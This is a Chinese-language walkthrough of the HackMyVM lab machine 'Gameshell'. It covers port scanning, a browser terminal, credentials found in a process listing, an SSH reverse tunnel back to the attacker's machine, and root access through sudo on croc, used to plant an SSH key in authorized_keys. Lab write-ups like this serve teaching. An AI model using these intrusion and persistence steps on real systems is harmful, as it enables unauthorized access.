Gameshell

image

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Gameshell

信息搜集

10.213.193.127

端口搜扫

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
root@LAPTOP-O235O5EH [~] ➜  rustscan -a 10.213.193.127                                                       [16:50:07]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.213.193.127:22
Open 10.213.193.127:80
Open 10.213.193.127:7681
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 16:51 CST
Initiating ARP Ping Scan at 16:51
Scanning 10.213.193.127 [1 port]
Completed ARP Ping Scan at 16:51, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:51
Completed Parallel DNS resolution of 1 host. at 16:51, 0.03s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:51
Scanning 10.213.193.127 [3 ports]
Discovered open port 22/tcp on 10.213.193.127
Discovered open port 7681/tcp on 10.213.193.127
Discovered open port 80/tcp on 10.213.193.127
Completed SYN Stealth Scan at 16:51, 0.02s elapsed (3 total ports)
Nmap scan report for 10.213.193.127
Host is up, received arp-response (0.00057s latency).
Scanned at 2026-01-10 16:51:42 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
7681/tcp open  unknown syn-ack ttl 64
MAC Address: 08:00:27:A8:F2:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

80信息搜集无结果,所以转向7681

7681/tcp

运行着Gameshell基于浏览器的交互式终端这是一个基于浏览器的交互式终端

https://github.com/phyver/GameShell

image

方便操作弹个shell

image

提权

www-data -> eviden

1
ps -aux

发现用户eviden正在运行ttyd进程。通过 HTTP 在 9876 端口上提供终端服务,并绑定到127。表明 Web 终端只能从本地主机访问。此外,使用-c 表示基本身份验证允许访问此服务,因为获得访问权限将提供一个具有 eviden 用户权限的交互式 shell。

凭据(admin:nimda

image

ssh端口转发

因为ttyd只能在本地访问,所以利用ssh反向隧道将端口9876暴露给我们的攻击机

1
2
3
4
ssh -N -R 0.0.0.0:8888:127.0.0.1:9876 root@10.213.193.64
会将目标机器上的 9876 端口转发到本地机器上的 8888 端口
0.0.0.0这里我没设置127是因为我用的wsl的kali,没装图形化,所以需要主机也能访问
root@10.213.193.64我的kali用户名和ip

image

这里会有一个登录解密,使用的是之前获取到的凭证admin:nimda

image

eviden -> root

1
2
3
4
5
6
eviden@GameShell:/$ sudo -l
Matching Defaults entries for eviden on GameShell:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User eviden may run the following commands on GameShell:
    (ALL) NOPASSWD: /usr/local/bin/croc

可以利用sudo提权,这个croc是一款允许任意两台计算机轻松安全地传输文件和文件夹的工具(https://github.com/schollz/croc)

这里采用的是传SSH公钥的方法

1
2
cd ~/.ssh
cat id_rsa_kali.pub >> authorized_keys

kali机器

1
croc send authorized_keys123

这里会生成一个供发送方和接收方用于端到端加密的密钥。

image

靶机

image

接收成功,直接使用密钥登录靶机

image